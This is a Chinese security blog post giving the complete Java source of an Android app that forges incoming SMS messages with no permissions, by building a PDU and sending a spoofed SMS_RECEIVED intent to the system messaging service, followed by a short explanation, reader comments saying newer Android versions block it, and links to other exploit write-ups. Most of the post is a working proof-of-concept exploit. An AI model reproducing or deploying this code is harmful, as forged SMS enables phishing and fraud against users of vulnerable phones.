wcf1987
- 浏览: 632001 次
- 性别:
- 来自: 西安
-
文章分类
最新评论
-
d1438138:
[img][/img]
google api 的一些神奇使用 -
waykingeye:
[i][b][u]引用[list]
[*][img][url] ...
No result defined for action and result input -
tss0823:
...
No result defined for action and result input -
yahier:
有什么办法能够捕捉,然后给出自定义的提示呢
No result defined for action and result input -
chen_lian:
恩恩 按照上面的代码测试一下觉得很对
java创建目录
0x01 这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思
0x02 代码实现
package com.smstrick;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;
public class SMSTrickActivity extends Activity implements OnClickListener{
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
View continue_button = this.findViewById(R.id.button1);
continue_button.setOnClickListener((OnClickListener) this);
}
public void onClick(View v) {
EditText eNum;
EditText eMsg;
String sNum;
String sMsg;
eNum = (EditText)findViewById(R.id.editText1);
eMsg = (EditText)findViewById(R.id.editText2);
sNum = eNum.getText().toString();
sMsg = eMsg.getText().toString();
//sNum cannot be blank
if(sNum.equals("")) sNum = "123456";
createFakeSms(this.getApplicationContext(),sNum,sMsg);
}
private static void createFakeSms(Context context, String sender, String body) {
//Source: http://stackoverflow.com/a/12338541
//Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
byte[] pdu = null;
byte[] scBytes = PhoneNumberUtils
.networkPortionToCalledPartyBCD("0000000000");
byte[] senderBytes = PhoneNumberUtils
.networkPortionToCalledPartyBCD(sender);
int lsmcs = scBytes.length;
byte[] dateBytes = new byte[7];
Calendar calendar = new GregorianCalendar();
dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));
dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));
dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));
dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));
dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));
dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));
dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar
.get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));
try {
Log.d("ice", "test one");
ByteArrayOutputStream bo = new ByteArrayOutputStream();
bo.write(lsmcs);
bo.write(scBytes);
bo.write(0x04);
bo.write((byte) sender.length());
bo.write(senderBytes);
bo.write(0x00);
bo.write(0x00); // encoding: 0 for default 7bit
bo.write(dateBytes);
try {
String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";
Class cReflectedNFCExtras = Class.forName(sReflectedClassName);
Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(
"stringToGsm7BitPacked", new Class[] { String.class });
stringToGsm7BitPacked.setAccessible(true);
byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,
body);
bo.write(bodybytes);
} catch (Exception e) {
e.printStackTrace();
}
pdu = bo.toByteArray();
} catch (IOException e) {
e.printStackTrace();
}
Intent intent = new Intent();
intent.setClassName("com.android.mms",
"com.android.mms.transaction.SmsReceiverService");
intent.setAction("android.provider.Telephony.SMS_RECEIVED");
intent.putExtra("pdus", new Object[] { pdu });
//intent.putExtra("format", "3gpp");
context.startService(intent);
}
private static byte reverseByte(byte b) {
return (byte) ((b & 0xF0) >> 4 | (b & 0x0F) << 4);
}
}
0x03 实质分析 核心在于自定义了系统的
Intent intent = new Intent();
intent.setClassName("com.android.mms",
"com.android.mms.transaction.SmsReceiverService");
intent.setAction("android.provider.Telephony.SMS_RECEIVED");
intent.putExtra("pdus", new Object[] { pdu });
//intent.putExtra("format", "3gpp");
context.startService(intent);
收到短信的intent,从而伪造了短信,而且不需要任何的权限。
分享到:
评论
3 楼
mengfeicheng2012
2014-02-11
貌似4.1的系统把这个漏洞堵上了
2 楼
pdsljlj
2013-11-21
android 4.1.2 以上好像是不能用的
1 楼
qian546000
2013-09-21
icefish大神,
为什么短信的内容如果是中文的话,就会出现异常呢?怎样修改代码,才能支持中文的短信内容呢?
为什么短信的内容如果是中文的话,就会出现异常呢?怎样修改代码,才能支持中文的短信内容呢?
发表评论
-
metasploit 图形化界面和自动化exploit脚本
2013-10-21 16:25 77720x01 最新版的metasploit没了图形化界面, ... -
APKTool签名的一个问题
2013-10-14 21:19 25230x01 昨天写了反编译,今天就写下签名的问题 0 ... -
APKTool打包的一个小问题
2013-10-13 20:23 248330x01,又开始写blog了,好久没有网络了,最近终于可以开 ... -
struts2远程执行漏洞学习(四)
2013-05-23 00:12 23590x01 最近又有了一个新的struts2漏洞,http:/ ... -
CVE-2013-1493 学习
2013-03-25 16:06 30230x01 这个又是一个java CVE,效果前几个一样, ... -
CVE-2013-0422 分析2
2013-01-11 23:47 35280x01 http://wcf1987.iteye.c ... -
CVE-2013-0422 学习
2013-01-11 16:26 41920x01 这个是这两天爆出来的,我构建了一个本地测试代码,主 ... -
CVE 2012 0507 分析
2012-12-17 16:00 35720x01 https://github.com/wche ... -
A new way to hack android app info
2012-11-06 01:04 1669最近新研究了一种android攻击手段,blog发到团队那里的 ... -
一次被黑追凶(未完待续)
2012-10-15 19:52 25180x01,某天师妹告诉我们某台服务器疑似被人干掉了,我果断远程 ... -
python 反编译 pyc 一些心得
2012-09-06 10:59 538470x01 , 现在用python的人也多了起来,代码安全始终是 ... -
关于web渗透中得一些记录
2012-08-24 23:31 36221. 当得到linux root shell时 ... -
mail xss
2012-08-11 21:57 17171 最近迷上了xss,感觉各种飘逸,特别是http://www ... -
ubuntu共享文件夹设置(转)
2012-08-01 14:50 41761 sudo mount -t vboxsf samp ... -
XSS学习二
2012-07-31 15:48 12681.xss学习到今天算是告一个段落了,发现了一个sohu邮箱 ... -
我的sinaapp
2012-07-27 22:10 1277我的sinapp小家终于成型了 http://icefish ... -
phpcms v9的补充
2012-07-25 21:28 1207前一篇留了个疑问: 为什么 file_get_conten ... -
phpcms v9 爆密码
2012-07-25 20:47 71001.首先是http://www.wooyun.org/b ... -
xss漏洞及其他-学习笔记
2012-07-23 17:05 1540http://www.wooyun.org/bugs/wooy ... -
最近接触的几个技术随笔
2012-07-13 14:04 13961.IIS短文件和文件夹泄漏漏洞 这个漏洞具体可以看核 ...
相关推荐
短信生成神器,解决了android4.4写短信无权限的问题, 可自动生成内容,也可以写动输入内容,可随机生成收发件箱也可选择,还可选汉语或英文字母,用以测试短信的备份还方便
在描述中提到的短信伪造漏洞是指CVE-2012-6636,这是一处允许恶意应用伪造短信来源的漏洞。攻击者可以利用这个漏洞发送看起来来自可信源的欺诈短信,诱导用户执行有害操作,例如点击恶意链接或泄露个人信息。此漏洞...
1. **权限管理机制**:Android基于Linux内核,采用权限管理系统,每个应用在安装时会被赋予特定的权限,如读取联系人、发送短信等。用户在安装应用时需明确这些权限,以防止恶意应用滥用权限。然而,一些应用可能会...
2. **权限检查**:恶意程序往往请求不必要的权限,如访问联系人、短信、位置等。通过对APP请求的权限进行分析,可以发现异常行为。 3. **代码混淆与反混淆**:恶意软件常使用代码混淆技术隐藏真实意图。静态分析...
这可能涉及网络通信协议分析,以及如何伪造数据以绕过拦截规则。 3. **隐私保护措施**: 隐私保护通常包括权限管理、数据加密和数据隔离。开发者可以通过源码学习如何检测应用请求的敏感权限,以及如何防止未授权...
FakeSMS (with broadAnywhere(Bug: 17356824))Android本地生成PDU伪造任意短信代码(支持中文GSM_UCS2)新版使用伪造短信PDU,无权限要求。APK下载:
例如,一个恶意软件可能在安装时仅申请了存储权限,但在实际运行时却执行了发送短信或监听通话的非法操作。 此外,Android系统的签名机制也存在不足。尽管Android要求所有应用都必须进行签名,但恶意开发者依然能够...
撤消应用程序的Android权限通常会使应用程序崩溃或发生故障。 XPrivacyLua通过为应用程序提供假数据而不是真实数据来解决此问题。 特征 使用简单 管理任何用户或系统应用 多用户支持 免费和开源 限制 确定活动(假...
Android远程监控技术一节则介绍了在Android平台上实现远程监控的技术细节,包括如何伪造短信来实现监控目的,这对于手机安全和隐私保护是一个重要议题。 整体来看,《黑客防线》杂志2013年6月刊涉及的内容非常丰富...
1. **权限管理**:Android系统赋予了应用程序不同的权限,如读取联系人、短信、位置信息等。开发者需要明确声明所需的权限,并在用户安装应用时进行提示。项目中可能涉及如何合理设置和使用这些权限,确保应用功能的...
v5.0对SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等主要威胁进行了系统的处理,实现了灵活、细致的权限管理功能,充分构筑了应用程序级安全。 8、易于扩展,便于开发 v5.0站点导航可自定义、可快速增加...
3. 用户认证与授权:实现用户登录系统,可能涉及用户名/密码验证、多因素认证(MFA,如短信验证码、指纹识别等)和权限控制。Spring Security是一个流行的Java框架,可用于处理这些问题。 4. 客户端应用:创建一个...